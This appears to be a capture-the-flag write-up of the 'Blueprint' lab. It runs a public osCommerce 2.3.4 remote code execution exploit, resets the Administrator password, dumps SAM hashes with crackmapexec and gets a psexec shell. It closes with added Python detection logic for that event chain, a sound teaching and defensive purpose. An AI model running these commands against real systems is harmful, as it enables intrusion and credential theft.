
# Blueprint

## Nmap

```
sudo nmap 10.10.153.99 -sV -sS

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Starting out, we check port 8080 and find a web server running. The root page is an index page showing that the commerce system osCommerce 2.3.4 is installed.

![](/files/PWGjETTixhRfdoYx7J2b)

A simple preliminary check with `searchsploit` shows multiple vulnerabilities for this version.

```
searchsploit oscommerce 2.3.4 -w
```

![](/files/mO05Ue6dpTv917TBpAUf)

Searching for Remote Code Execution exploits on GitHub shows a PoC from the user nobodyatall648.

GitHub: <https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution>

The repository describes the exploit as follows:

*"Exploiting the install.php finish process by injecting php payload into the db\_database parameter & read the system command output from configure.php"*.

Using the example provided on GitHub, we clone the repository and run it with the following syntax:

```
python3 exploit.py http://<IP>/oscommerce-2.3.4/catalog/
```

![](/files/o3j1dVW266mGyKiiaamz)

After gaining a SYSTEM-level shell on the target, we next aim to obtain a proper reverse shell and to dump the hashes from the target system.

With SYSTEM access we change the local administrator password.

```
net user administrator Password123
```

We then use `crackmapexec` to dump the NTLM hashes from the SAM file.

```bash
crackmapexec smb '10.10.153.99' -u 'Administrator' -p 'Password123' --local-auth --sam
```

![](/files/TaeeJ0B0ioESPKeYTmRq)

After dumping the hashes from the SAM, we use `psexec.py` to gain shell access to the target system.

```
psexec.py ./administrator:'Password123'@'10.10.153.99'
```

![](/files/fvALr94bFzAzU3tkxRQk)
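From the defender's side, the chain above leaves a distinctive trail in the Windows event logs: a password reset of the built-in Administrator (Security event 4724), a network logon as Administrator from a remote host (4624, logon type 3), and a new service installed to run the remote shell (System event 7045). The following detection logic is an added example, not part of the writeup; the event records, timestamps, host names and IP addresses are constructed for illustration. Because psexec-style tools do not all use a fixed service name, the rule correlates the three events within a time window rather than matching one name.

```python
# Added example: correlate Windows events for the reset -> remote logon -> service chain.
# Event records are constructed for this example (simplified fields, not raw EVTX).
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)

# Constructed sample events; the service name is arbitrary, as a psexec-style tool may pick one.
EVENTS = [
    {"ts": "2024-01-01T10:00:00", "id": 4724, "target": "Administrator", "subject": "SYSTEM"},
    {"ts": "2024-01-01T10:01:30", "id": 4624, "user": "Administrator", "logon_type": 3, "src_ip": "10.0.0.5"},
    {"ts": "2024-01-01T10:01:35", "id": 7045, "service": "kQyX", "image": r"%SystemRoot%\kQyX.exe"},
    {"ts": "2024-01-01T12:00:00", "id": 4624, "user": "jdoe", "logon_type": 2, "src_ip": "-"},
]


def parse(ts):
    return datetime.fromisoformat(ts)


def find_psexec_after_reset(events, window=WINDOW):
    """Return findings as (reset_time, source_ip, service_name) tuples.

    A finding requires, in order and within `window` of the reset:
      4724 resetting the local Administrator password,
      4624 logon type 3 (network) as Administrator from a remote address,
      7045 new service installed (the usual footprint of a remote-exec tool).
    """
    events = sorted(events, key=lambda e: parse(e["ts"]))
    findings = []
    for i, reset in enumerate(events):
        if reset["id"] != 4724 or reset.get("target", "").lower() != "administrator":
            continue
        t0 = parse(reset["ts"])
        logon_ip = None
        for later in events[i + 1:]:
            if parse(later["ts"]) - t0 > window:
                break  # outside the correlation window; stop scanning for this reset
            if (later["id"] == 4624 and later.get("logon_type") == 3
                    and later.get("user", "").lower() == "administrator"):
                logon_ip = later.get("src_ip")
            elif later["id"] == 7045 and logon_ip is not None:
                findings.append((reset["ts"], logon_ip, later.get("service")))
                break
    return findings


if __name__ == "__main__":
    for reset_ts, ip, svc in find_psexec_after_reset(EVENTS):
        print(f"ALERT: Administrator reset at {reset_ts}, remote logon from {ip}, service {svc} installed")
```

On a real host the same three fields can be pulled from the Security and System logs (for example with `Get-WinEvent`) and fed to `find_psexec_after_reset` in the same dictionary shape.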
